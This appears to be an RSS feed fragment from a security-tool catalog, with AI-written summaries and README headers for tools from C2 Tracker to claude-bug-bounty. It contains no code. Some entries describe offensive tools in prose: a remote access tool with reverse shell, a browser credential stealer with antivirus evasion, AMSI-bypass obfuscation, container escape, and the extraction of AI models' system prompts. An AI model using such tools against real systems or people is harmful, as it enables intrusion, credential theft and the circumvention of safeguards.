&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; C2 Tracker is a community-driven IOC feed that aggregates IP addresses related to known malware, botnets, and command-and-control (C2) infrastructures by leveraging searches from platforms like Shodan. Its primary use case is to facilitate threat intelligence by providing a regularly updated feed that can be ingested by various SIEM and EDR systems, enhancing detection and investigation capabilities. Notable features include version-controlled historical data, weekly updates, and compatibility with tools like OpenCTI and FortinetSIEM for streamlined integration and alerting.&lt;/p&gt;</description></item><item><title>caddy-waf</title><link>https://rainmana.github.io/hackyfeed/tools/fabriziosalmi-caddy-waf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fabriziosalmi-caddy-waf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Caddy WAF is a customizable middleware for the Caddy web server that functions as a Web Application Firewall, designed to provide advanced protection against a wide range of web-based threats. Key features include regex-based filtering, IP blacklisting, geo-blocking, rate limiting, anomaly scoring, and detailed monitoring capabilities, all aimed at securing applications while ensuring high performance through techniques like zero-copy networking and wait-free concurrency. The tool also supports seamless dynamic configuration reloads and offers precise insights into traffic and security events, making it a robust solution for safeguarding web applications.&lt;/p&gt;</description></item><item><title>cai</title><link>https://rainmana.github.io/hackyfeed/tools/aliasrobotics-cai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aliasrobotics-cai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cybersecurity AI (CAI) is a robust framework designed for enhancing cybersecurity measures by leveraging artificial intelligence. Its primary use case involves threat detection and incident response, making it suitable for both community and professional environments. Notable features include multi-platform support, advanced token management in the Professional Edition, and real-time performance benchmarks that are accessible for evaluation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cybersecurity-ai-cai"&gt;Cybersecurity AI (&lt;code&gt;CAI&lt;/code&gt;)&lt;/h1&gt;
&lt;div align="center"&gt;
 &lt;p&gt;
 &lt;a align="center" href="" target="https://github.com/aliasrobotics/CAI"&gt;
 &lt;img
 width="100%"
 src="https://github.com/aliasrobotics/cai/raw/main/media/cai.png"
 &gt;
 &lt;/a&gt;
 &lt;/p&gt;
&lt;p&gt;&lt;a href="https://trendshift.io/repositories/14317" target="_blank"&gt;&lt;img src="https://trendshift.io/api/badge/repositories/14317" alt="aliasrobotics%2Fcai | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/&gt;&lt;/a&gt;
&lt;a href="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-starred-top-3" target="_blank"&gt;&lt;img src="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-starred-top-3" alt="European Open Source - Most Starred Top 3" style=" height: 75px;" height="75"/&gt;&lt;/a&gt;
&lt;a href="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-forked-top-3" target="_blank"&gt;&lt;img src="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-forked-top-3" alt="European Open Source - Most Forked Top 3" style="height: 75px;" height="75"/&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>caido</title><link>https://rainmana.github.io/hackyfeed/tools/caido-caido/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/caido-caido/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Caido is a web application auditing tool designed for security professionals and enthusiasts, facilitating efficient and user-friendly assessments of web application security. It features regular software updates, a comprehensive dashboard for managing audits, and a community platform for user support and engagement.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;img width="1000" alt="image" src="https://user-images.githubusercontent.com/6225588/211916659-567751d1-0225-402b-9141-4145c18b0834.png"&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;a href="https://caido.io/"&gt;Website&lt;/a&gt;
 &lt;span&gt;&amp;nbsp;&amp;nbsp;•&amp;nbsp;&amp;nbsp;&lt;/span&gt;
 &lt;a href="https://dashboard.caido.io/"&gt;Dashboard&lt;/a&gt;
 &lt;span&gt;&amp;nbsp;&amp;nbsp;•&amp;nbsp;&amp;nbsp;&lt;/span&gt;
 &lt;a href="https://docs.caido.io/" target="_blank"&gt;Docs&lt;/a&gt;
 &lt;span&gt;&amp;nbsp;&amp;nbsp;•&amp;nbsp;&amp;nbsp;&lt;/span&gt;
 &lt;a href="https://links.caido.io/roadmap"&gt;Roadmap&lt;/a&gt;
 &lt;span&gt;&amp;nbsp;&amp;nbsp;•&amp;nbsp;&amp;nbsp;&lt;/span&gt;
 &lt;a href="https://github.com/caido/caido/tree/main/brand"&gt;Branding&lt;/a&gt;
 &lt;span&gt;&amp;nbsp;&amp;nbsp;•&amp;nbsp;&amp;nbsp;&lt;/span&gt;
 &lt;a href="https://links.caido.io/www-discord" target="_blank"&gt;Discord&lt;/a&gt;
 &lt;br /&gt;
 &lt;hr /&gt;
&lt;/div&gt;
&lt;h2 id="-welcome"&gt;👋 Welcome&lt;/h2&gt;
&lt;p&gt;Welcome to Caido!&lt;/p&gt;
&lt;p&gt;Caido aims to help security professionals and enthusiasts audit web applications with efficiency and ease.&lt;/p&gt;</description></item><item><title>cameradar</title><link>https://rainmana.github.io/hackyfeed/tools/ullaakut-cameradar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ullaakut-cameradar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cameradar is a tool designed for scanning RTSP endpoints on authorized targets, utilizing dictionary attacks to discover credentials and stream routes. Its primary use case is to assess the security of RTSP streams by detecting open hosts, identifying device models, and generating comprehensive reports of findings. Notable features include the ability to enumerate multiple RTSP stream routes and credentials through customizable dictionaries, as well as support for Docker for streamlined deployment.&lt;/p&gt;</description></item><item><title>can-i-take-over-dns</title><link>https://rainmana.github.io/hackyfeed/tools/indianajson-can-i-take-over-dns/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/indianajson-can-i-take-over-dns/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Can I Take Over DNS?&amp;rdquo; tool is a resource for security researchers that identifies DNS providers and assesses their vulnerability to DNS takeover attacks. It features a comprehensive list of DNS providers, along with their statuses, fingerprints, and guidance for conducting takeover attempts, facilitating informed bug bounty reporting. The project encourages community contributions to enhance its coverage and accuracy in identifying potential vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;Can I Take Over DNS?&lt;br&gt;&lt;sup&gt;&lt;sub&gt;A list of DNS providers and whether their zones are vulnerable to DNS takeover!&lt;br&gt;&lt;sup&gt; Maintained by&lt;/sup&gt; &lt;a target="_blank" href="https://twitter.com/intent/user?screen_name=indianajson"&gt;&lt;img src="https://img.shields.io/twitter/follow/indianajson?style=social&amp;label=%40indianajson"/&gt;&lt;/a&gt;&amp;nbsp;&lt;/sub&gt;&lt;/sup&gt; &lt;/h1&gt;
&lt;p&gt;Inspired by the popular &lt;a href="https://github.com/EdOverflow/can-i-take-over-xyz"&gt;Can I Take Over XYZ?&lt;/a&gt; project by &lt;a href="https://github.com/EdOverflow"&gt;@EdOverflow&lt;/a&gt; this project is uniquely oriented towards &lt;a href="#what-is-a-dns-takeover"&gt;DNS takeovers&lt;/a&gt;. DNS takeovers pose a high threat to companies, warrant high bounties, and are easy to find. We are trying to make this list comprehensive, so please &lt;a href="#contributions"&gt;contribute&lt;/a&gt;!&lt;/p&gt;</description></item><item><title>CANalyzat0r</title><link>https://rainmana.github.io/hackyfeed/tools/schutzwerk-canalyzat0r/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/schutzwerk-canalyzat0r/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CANalyzat0r is a modular and extensible tool designed for analysis and management of Controller Area Network (CAN) traffic, including support for CAN FD. It features a graphical user interface for comfortable analysis, multi-interface support, project management capabilities, and advanced functionalities such as threaded sending, fuzzing, and packet filtering, making it a comprehensive solution for CAN traffic analysis and experimentation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://rainmana.github.io/hackyfeed/.repoResources/mainTab.png?raw=true" alt="Alt text" title="CANalyzat0r main tab"&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;This software project is a result of a Bachelor&amp;rsquo;s thesis created at &lt;a href="https://www.schutzwerk.com"&gt;SCHUTZWERK&lt;/a&gt; in collaboration with &lt;a href="https://www.hs-aalen.de/"&gt;Aalen University&lt;/a&gt; by Philipp Schmied (&lt;a href="https://twitter.com/CaptnBanana"&gt;@CaptnBanana&lt;/a&gt;).&lt;/em&gt;&lt;/p&gt;</description></item><item><title>cansina</title><link>https://rainmana.github.io/hackyfeed/tools/deibit-cansina/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/deibit-cansina/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cansina is a web content discovery application designed to identify hidden resources in web applications by sending requests and analyzing responses. Its primary use case is for penetration testing, offering features such as data persistence with SQLite, multithreading, customizable headers, and comprehensive filtering options. Notable functionalities include support for multiple wordlists, SSL and proxy capabilities, and integrated tree viewing of results, making it a versatile tool for security professionals.&lt;/p&gt;</description></item><item><title>CAPEv2</title><link>https://rainmana.github.io/hackyfeed/tools/kevoreilly-capev2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kevoreilly-capev2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CAPE (Malware Configuration And Payload Extraction) is an advanced malware sandbox designed to execute and analyze malicious files in an isolated environment while capturing dynamic behavior and forensic artifacts. Key features include automated malware unpacking, YARA signature-based classification, comprehensive API hooking for behavioral instrumentation, and detailed memory and network traffic analysis. CAPE enhances traditional sandboxes with interactive desktop capabilities and sophisticated unpacking techniques, making it a powerful tool for malware research and analysis.&lt;/p&gt;</description></item><item><title>capsulecorp-pentest</title><link>https://rainmana.github.io/hackyfeed/tools/r3dy-capsulecorp-pentest/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r3dy-capsulecorp-pentest/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Capsulecorp Pentest is a pre-configured virtual network environment designed for learning network penetration testing, utilizing Vagrant and Ansible to deploy five virtual machines, including a Linux attacker and four Windows 2019 servers with vulnerable services. This tool streamlines the setup process, allowing users to quickly launch a fully functional Active Directory domain for educational purposes, with included features like a vulnerable Jenkins server, Apache Tomcat, and Metasploit. Its primary use case is to facilitate hands-on pentesting practice in a controlled environment, enhancing learning efficiency.&lt;/p&gt;</description></item><item><title>CaptfEncoder</title><link>https://rainmana.github.io/hackyfeed/tools/guyoung-captfencoder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guyoung-captfencoder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CaptfEncoder is an open-source, cross-platform network security tool suite designed for code conversion, cryptography, and a variety of online query tools. It features a wide range of encoding methods, classical ciphers, and modern cryptographic algorithms, enabling users to perform tasks such as data encoding, encryption, and security analysis efficiently. The tool is built in Rust, ensuring enhanced performance and supports a variety of operating systems including Windows, Linux, and macOS.&lt;/p&gt;</description></item><item><title>cargo-auditable</title><link>https://rainmana.github.io/hackyfeed/tools/rust-secure-code-cargo-auditable/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rust-secure-code-cargo-auditable/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; cargo-auditable is a Rust tool that embeds the dependency tree of a Rust executable in JSON format within the compiled binary, allowing for precise auditing of crate versions against known vulnerabilities. It facilitates vulnerability scanning in production without additional bookkeeping, supporting major operating systems and WebAssembly. Notably, it integrates seamlessly with existing Cargo commands and works in conjunction with tools like cargo-audit to enhance security practices in Rust development.&lt;/p&gt;</description></item><item><title>CatSniffer</title><link>https://rainmana.github.io/hackyfeed/tools/electroniccats-catsniffer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/electroniccats-catsniffer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CatSniffer is a versatile multiprotocol and multiband hardware tool designed for the sniffing, communication, and exploitation of Internet of Things (IoT) devices. It supports various wireless technologies, including LoRa, Sub-1 GHz, and 2.4 GHz, and is compatible with multiple third-party software applications, allowing customization and extensive functionality for IoT security researchers and developers. Key features include a built-in USB-UART bridge, support for various protocols, and a flexible design that enables the integration of different antennas and easy programming.&lt;/p&gt;</description></item><item><title>CDK</title><link>https://rainmana.github.io/hackyfeed/tools/cdk-team-cdk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cdk-team-cdk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CDK is a zero dependency container penetration toolkit designed for security testing, enabling stable exploitation across slimmed containers. Its primary use case revolves around container escaping, persistence, and lateral movement within Kubernetes clusters, featuring modules for evaluating container weaknesses, executing various exploits, and providing essential network tools. Notable capabilities include information gathering, direct interaction with the container&amp;rsquo;s environment, and the ability to initiate and manage attacks seamlessly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cdk---zero-dependency-container-penetration-toolkit"&gt;CDK - Zero Dependency Container Penetration Toolkit&lt;/h1&gt;
&lt;p&gt;English | &lt;a href="https://github.com/cdk-team/CDK/wiki/CDK-Home-CN"&gt;简体中文&lt;/a&gt;&lt;/p&gt;</description></item><item><title>censys-subdomain-finder</title><link>https://rainmana.github.io/hackyfeed/tools/christophetd-censys-subdomain-finder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/christophetd-censys-subdomain-finder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Censys Subdomain Finder is a command-line tool designed to enumerate subdomains associated with a specified domain using Certificate Transparency logs from Censys. It retrieves subdomains that have ever been issued an SSL certificate by a public Certificate Authority, offering features such as output to a text file and support for API authentication. Notably, users must set up an account with Censys to access the API, as free accounts will face limitations beginning in late 2024.&lt;/p&gt;</description></item><item><title>cent</title><link>https://rainmana.github.io/hackyfeed/tools/xm1k3-cent/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xm1k3-cent/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cent is a tool designed to organize community-contributed Nuclei templates, simplifying the process of managing and utilizing these resources for vulnerability scanning. Key features include the ability to clone templates from multiple repositories, validate their integrity, and generate detailed summaries of the templates&amp;rsquo; metadata, including statistics on validation and severity distribution. Additionally, Cent supports multi-threading for efficient repository management and offers commands for initializing configurations, updating templates, and accessing versioning information.&lt;/p&gt;</description></item><item><title>certificates</title><link>https://rainmana.github.io/hackyfeed/tools/smallstep-certificates/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/smallstep-certificates/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;step-ca&lt;/code&gt; is an online certificate authority designed for secure and automated certificate management in DevOps environments. It features the capability to issue HTTPS and TLS certificates for various services like VMs, containers, and APIs, as well as SSH certificates, while supporting automated certificate management through ACME protocols. Its flexibility allows users to select key types and certificate lifetimes, making it an essential tool for managing cryptographic needs within modern infrastructures.&lt;/p&gt;</description></item><item><title>chain-bench</title><link>https://rainmana.github.io/hackyfeed/tools/aquasecurity-chain-bench/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aquasecurity-chain-bench/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Chain-bench is an open-source tool designed for auditing software supply chain security compliance based on the CIS Software Supply Chain benchmark. It examines the entire Software Development Life Cycle (SDLC) to identify risks from code inception to deployment, ensuring adherence to organizational security policies. Notable features include CLI-based scanning capabilities, integration options with various SCM platforms, and support for Docker deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="docs/imgs/banner_dm.png"&gt;
 &lt;source media="(prefers-color-scheme: light)" srcset="docs/imgs/banner_lm.png"&gt;
 &lt;img alt="chain-bench logo" src="docs/imgs/banner_lm.png"&gt;
&lt;/picture&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;p&gt;&lt;a href="https://github.com/aquasecurity/chain-bench/blob/main/docs/"&gt;📖 Documentation&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Chain-bench is an open-source tool for auditing your software supply chain stack for security compliance based on a new
&lt;a href="docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf"&gt;CIS Software Supply Chain benchmark&lt;/a&gt;.
The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. To win the race against hackers and protect your sensitive data and customer trust, you need to ensure your code is compliant with your organization’s policies.&lt;/p&gt;</description></item><item><title>changeme</title><link>https://rainmana.github.io/hackyfeed/tools/ztgrace-changeme/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ztgrace-changeme/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; changeme is a default credential scanner designed to identify default and backdoor credentials, with a focus beyond common credentials. It features support for multiple protocols, including HTTP, MSSQL, MySQL, PostgreSQL, SSH, SNMP, and FTP, and allows users to easily configure new credentials via YAML files without code changes. The tool offers flexible target loading options and can run efficiently using Docker, particularly with Redis as a queue backend, making it suitable for diverse scanning tasks across network environments.&lt;/p&gt;</description></item><item><title>CHAOS</title><link>https://rainmana.github.io/hackyfeed/tools/tiagorlampert-chaos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tiagorlampert-chaos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CHAOS is an open-source Remote Administration Tool developed in Golang, designed for generating binaries that facilitate control over remote operating systems. It features robust capabilities such as reverse shell access, file manipulation (upload, download, delete), remote system information retrieval, and several system control functions like shutdown and restart, making it a versatile tool for remote administration tasks across both Windows and Linux platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="#"&gt;
 &lt;img src="https://raw.githubusercontent.com/tiagorlampert/CHAOS/master/public/logo.png" alt="CHAOS logo" width="400" height="130"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;h1 align="center"&gt;CHAOS: Remote Administration Tool&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://golang.org/"&gt;
 &lt;img src="https://img.shields.io/badge/Golang-1.18+-blue.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/tiagorlampert/CHAOS/releases"&gt;
 &lt;img src="https://img.shields.io/badge/Release-v5 Beta-red.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/tiagorlampert/CHAOS/blob/master/LICENSE"&gt;
 &lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://hub.docker.com/r/tiagorlampert/chaos"&gt;
 &lt;img src="https://img.shields.io/docker/pulls/tiagorlampert/chaos.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://opensource.org"&gt;
 &lt;img src="https://img.shields.io/badge/Open%20Source-%E2%9D%A4-brightgreen.svg?style=flat-square"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>cheatsheets</title><link>https://rainmana.github.io/hackyfeed/tools/cipher387-cheatsheets/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cipher387-cheatsheets/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Cyber Detective Cheatsheets repository provides a comprehensive collection of cheat sheets focused on various aspects of Open Source Intelligence (OSINT) gathering techniques. Notable features include easily accessible text versions of cheat sheets on topics such as username, email, and reverse image OSINT, as well as guides for information gathering from companies and geolocation data. This tool serves as a practical resource for security professionals and investigators looking to streamline their OSINT processes.&lt;/p&gt;</description></item><item><title>Chimera</title><link>https://rainmana.github.io/hackyfeed/tools/tokyoneon-chimera/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tokyoneon-chimera/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Chimera is a PowerShell obfuscation script designed to evade Detection and AMSI mechanisms by transforming potentially malicious PowerShell scripts into less recognizable forms. Its primary use case is for penetration testing and research into bypassing antivirus signatures, utilizing advanced techniques like string substitution and variable concatenation. Notable features include the capability to digest and obfuscate known malicious scripts while effectively bypassing security detection tools, thereby demonstrating the vulnerabilities in existing AV signatures.&lt;/p&gt;</description></item><item><title>chromepass</title><link>https://rainmana.github.io/hackyfeed/tools/darkarp-chromepass/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/darkarp-chromepass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Chromepass is a Python-based console application designed to decrypt saved passwords and cookies from various web browsers, including Google Chrome, Chromium, and others. Its primary use case is for extracting sensitive credentials with minimal detection by antivirus software through custom build methodologies. Notable features include the ability to remotely send the recovered data, customizable error messages, and a tailored user interface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align='center'&gt;Chromepass - Hacking Chrome Saved Passwords and Cookies&lt;/h1&gt;
&lt;p align="center"&gt;	
 &lt;img src="https://img.shields.io/badge/Platform-Windows-green" /&gt;
	&lt;a href="https://github.com/darkarp/chromepass/releases/latest"&gt;
	&lt;img src="https://img.shields.io/github/v/release/darkarp/chromepass" alt="Release" /&gt;
	&lt;/a&gt;
 &lt;a href="https://travis-ci.org/darkarp/chrome-password-hacking"&gt;
 &lt;img src="https://img.shields.io/badge/build-passing-green" alt="Build Status on CircleCI" /&gt;
	&lt;/a&gt;
 &lt;img src="https://img.shields.io/maintenance/yes/2021" /&gt;
	&lt;/br&gt;
 &lt;a href="https://github.com/darkarp/chromepass/commits/master"&gt;
 &lt;img src="https://img.shields.io/github/last-commit/darkarp/chromepass" /&gt;
 &lt;/a&gt;
 &lt;img alt="Scrutinizer code quality (GitHub/Bitbucket)" src="https://img.shields.io/scrutinizer/quality/g/darkarp/chromepass?style=flat"&gt;
 &lt;a href="https://github.com/darkarp/chromepass/blob/master/LICENSE"&gt;
 &lt;img src="http://img.shields.io/github/license/darkarp/chromepass" /&gt;
 &lt;/a&gt;
 &lt;/br&gt;
 &lt;a href="https://github.com/darkarp/chromepass/issues?q=is%3Aopen+is%3Aissue"&gt;
	&lt;img alt="GitHub issues" src="https://img.shields.io/github/issues/darkarp/chromepass"&gt;
&lt;/a
&lt;a href="https://github.com/darkarp/chromepass/issues?q=is%3Aissue+is%3Aclosed"&gt;
	&lt;img alt="GitHub closed issues" src="https://img.shields.io/github/issues-closed/darkarp/chromepass"&gt;
&lt;/a&gt;
&lt;/br&gt;
 &lt;a href="https://discord.gg/beczNYP"&gt;
 &lt;img src="https://img.shields.io/badge/discord-join-7289DA.svg?logo=discord&amp;longCache=true&amp;style=flat" /&gt;
 &lt;/a&gt;
 &lt;/br&gt;
 &lt;a href="https://github.com/darkarp/chromepass/blob/master/templates/resources/demo.gif" target="_blank"&gt;View Demo&lt;/a&gt;
 ·
 &lt;a href="https://github.com/darkarp/chromepass/issues/new?assignees=&amp;labels=&amp;template=bug_report.md&amp;title="&gt;Report Bug&lt;/a&gt;
 ·
 &lt;a href="https://github.com/darkarp/chromepass/issues/new?assignees=&amp;labels=&amp;template=feature_request.md&amp;title="&gt;Request Feature&lt;/a&gt;
 &lt;/p&gt;</description></item><item><title>Ciphey</title><link>https://rainmana.github.io/hackyfeed/tools/bee-san-ciphey/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bee-san-ciphey/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ciphey is a fully automated tool designed for decryption, decoding, and cracking of encoded data, leveraging natural language processing and artificial intelligence techniques. Its primary use case is to assist cybersecurity professionals and enthusiasts in deciphering encrypted messages and files without requiring prior knowledge of the encryption methods used. Notable features include support for various installation methods (Python, Docker, MacPorts, Homebrew) and a user-friendly interface that simplifies the decryption process.&lt;/p&gt;</description></item><item><title>CL4R1T4S</title><link>https://rainmana.github.io/hackyfeed/tools/elder-plinius-cl4r1t4s/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/elder-plinius-cl4r1t4s/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CL4R1T4S is a transparency and observability tool designed to extract and provide insights into the system prompts and guidelines used by major AI models and agents from various organizations. Its primary use case is to enable users to understand the underlying instructions that shape AI behavior, thereby fostering trust and accountability in AI interactions. Notable features include the ability to leak, extract, or reverse-engineer model prompts and contributions from users for a broader understanding of AI systems.&lt;/p&gt;</description></item><item><title>clairvoyance</title><link>https://rainmana.github.io/hackyfeed/tools/nikitastupin-clairvoyance/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nikitastupin-clairvoyance/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Clairvoyance is a tool designed to extract GraphQL API schemas even when introspection is disabled, thereby facilitating schema discovery in environments such as production where introspection is typically forbidden. It outputs the schema in a JSON format compatible with other visualization and analysis tools, and it can be easily installed via pip or Docker, allowing users to customize their schema extraction processes using various wordlists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="clairvoyance"&gt;Clairvoyance&lt;/h1&gt;
&lt;p&gt;Obtain GraphQL API schema even if the introspection is disabled.&lt;/p&gt;</description></item><item><title>ClatScope</title><link>https://rainmana.github.io/hackyfeed/tools/clats97-clatscope/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/clats97-clatscope/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ClatScope is an advanced OSINT tool designed for comprehensive online reconnaissance, catering to investigators and cybersecurity professionals. It consolidates data from multiple APIs to deliver insights on IP addresses, domains, emails, and personal data, while offering features such as username verification across numerous platforms, phone number validation, and email security checks. ClatScope Mini provides a simplified version for quick operations without API configuration, making it accessible for immediate use.&lt;/p&gt;</description></item><item><title>claude-bug-bounty</title><link>https://rainmana.github.io/hackyfeed/tools/shuvonsec-claude-bug-bounty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shuvonsec-claude-bug-bounty/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Claude Bug Bounty is an AI-powered agent harness tailored for professional bug bounty hunting, enabling users to streamline their testing processes. It intelligently orchestrates over 25 tools, remembers past findings across targets, validates vulnerabilities to reduce false positives, and generates ready-to-submit reports in under a minute. Notable features include Burp MCP integration for live traffic monitoring and an autonomous hunting mode that simplifies the testing workflow.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
